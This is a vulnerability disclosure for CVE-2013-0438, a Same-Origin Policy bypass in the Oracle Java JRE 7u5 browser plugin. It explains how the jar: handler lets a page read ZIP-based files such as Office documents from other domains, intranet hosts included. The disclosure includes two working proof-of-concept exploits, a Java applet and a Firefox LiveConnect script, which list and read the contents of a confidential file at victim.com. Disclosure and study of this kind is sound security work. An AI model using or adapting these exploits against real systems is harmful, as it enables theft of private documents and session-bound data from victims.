CVE-2013-0438, Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes, XSS, Cross Site Scripting

Oracle Java JRE 7u5 SOP Bypass for ZIP-Based Filetypes

CVE-2013-0438, Oracle Document

XSS.CX Allowance: $4,000 (Four Thousand US Dollars)

Keywords
Security, Web, Cross-Site Scripting, Private Bug Report, Oracle, Java, JRE, Same-Origin Policy

Summary
A bug in the Oracle Java  JRE 7u5 browser plugin allows cross-domain theft of any information encapsulated in a JAR or ZIP file. With the Java browser plugin being used by ~75% of all Internet users[1] this issue affects an overall of 1.7B users worldwide[2]. An attacker can access MS Word Documents, Excel Sheets, Visio data and other ZIP-based files across domains. No user interaction is required to carry out the attack. This document will introduce and discuss the vulnerability and provide several Proof-of-Concept (PoC) installations and code examples.
Introduction

Description
The Same Origin Policy installed in modern browsers is based on several components of the origins of two websites attempting communication with each other. Among those are the protocol those websites are using (HTTP, HTTPS or others), the subdomain, domain, top-level domain and in most user agents the port. In case two websites wish to initiate communication, they must share origin – or utilize browser-features such as domain relaxation or Cross-Origin Resource Sharing (CORS). The usual use case for the SOP on the vast majority of websites is delimiting cross origin communication capabilities for the sake of security and privacy.

The Java Runtime Engine nevertheless provides an own interpretation of the SOP and mostly relies on the IP address of two HTTP resources to determine, whether they might communicate across origins or not. Using cross origin communication for within a Java Applet or LiveConnect code with Java 6 and earlier versions required the browser to load the website via the IPv4 address it can be requested with. A resource residing on 1.2.3.4 could only request information from other resources residing on 1.2.3.4. Any other communication attempts from unsigned applets and LiveConnect code yielded security exceptions to be thrown.

This bug allows to bypass the policy for file types that are ZIP based. Using the handler for the jar: pseudo-protocol, all files within the browsers reach – including the intranet – are accessible. Due to the fact that we abuse a logical bug in the API’s control mechanisms, we comfortably have access to Java exposed interfaces that allow us to list files in an archive and read arbitrary information. The attack is limited to files reachable via HTTP or HTTPS. Since the attack uses Java’s environment to access these files, there are a few side-effects: Java has its own HTTP interfaces and does not include the user’s cookies when used as an applet. Also, it has its own certificate store, so self-signed SSL certificates that have been white-listed in the browser’s certificate store are only white-listed for Java if any other applet or Java application has done so. Valid SSL certificates are no drawback in this scenario.

This attack much easier to carry out in Firefox: Current Firefox versions come with a feature called LiveConnect that allows JavaScript code to use Java APIs without compilation or the use of bytecode Java files as applets. Simple script tags suffice (e.g. <script>x = new java.net.URL(); …</script>).
In this scenario, we are bound to the browser’s certificate and cookie store. All outgoing requests can bypass the Same Origin Policy and access foreign files but include the known sessions, saved passwords and accept formerly white-listed self-signed certificates.

PoC Examples
Example 1: Java Applet
This example works in all current browsers that come with Java support. The applet can read arbitrary ZIP files and their content. The target in line 14 has to be changed accordingly.

import java.awt.*;
import java.applet.Applet;
import java.io.*;
import java.net.*;

public class test2 extends Applet {

   private TextArea ltArea = new TextArea(“”, 100, 300);

   public void init() {
    add(ltArea);
}
   public void paint (Graphics g)  {
    String url_b = “jar:http://victim.com/confidential.odt!/content.xml”;
    String content = “”;
    try {
            URL u = new URL(url_b);
            BufferedReader ff = new java.io.BufferedReader(new java.io.InputStreamReader(u.openStream() ) );          
            while (ff.ready()) { content += ff.readLine();  }
    }
    catch (Exception e) { g.drawString( “Error”,100,100); }
            ltArea.setText(content);
  }
}

Example 2: Proof of Concept for Firefox, listing ZIP file index and content of specific file
<pre id=’res’>
</pre>
<script>
resultdiv = document.querySelector(“#res”);
url_a = “jar:https://victim.com/confidential.odt!/”;
url_b = “jar:https://victim.com/confidential.odt!/content.xml”;
//url_a = “jar:http://victim.com/confidential.docx!”;
//url_b = “jar:http://victim.com/confidential.docx!/word/document.xml”;

try {
        // Example 1: List all files in JAR-Archive
        resultdiv.textContent += ‘Reading JAR and listing files…n’

        u = new java.net.URL(url_a);
        x = u.openConnection();
        jarfile = x.getJarFile();
        iter = jarfile.entries();
        filelist = [];
        while (iter.hasMoreElements()) {
            i = iter.nextElement();
            filelist.push(i.getName() + ” (“+ i.getSize()+ “Bytes)” );
        }
            resultdiv.textContent += “Files in JAR: nt” + filelist.join(‘,nt’) + ‘nn’;
 
 
        // Example 2: Read file content in JAR-Archive
 
        resultdiv.textContent += ‘Reading file content in JAR…n’  

        u = new java.net.URL(url_b);
        ff = new java.io.BufferedReader(new java.io.InputStreamReader(u.openStream() ) )
        content = “”;
        while (ff.ready()) { content += ff.readLine();  }
        resultdiv.textContent += “Content of “+ url_b + “: “” + content +'”n’;
 
}
catch(e) {
        resultdiv.textContent += e;
        resultdiv.textContent += ‘nThis example has been tested with Firefox and Java 7 Update 5’
}
</script>
Listing 2: example2_firefox_only.html

Bug Metrics
Calculated CVSSv2 Score = 4.5

Impact: High – The exploit allows reading arbitrary filetypes that are based on the ZIP format. This includes documents for Microsoft Office, OpenOffice, AutoCAD and many more. Reading can occur from any HTTP or HTTPS resource accessible to the browser, including its Intranet

Exploitability: High – Stemming from a logical bug in the Java API, exploitability has a very high probability of success. The only requirement is, of course, that the Java browser plugin is installed and working.

________________
[1] StatOWL Java plugin usage in 2012 http://www.statowl.com/java.php
[2] World Internet Usage Stats 2012 http://www.internetworldstats.com/stats.htm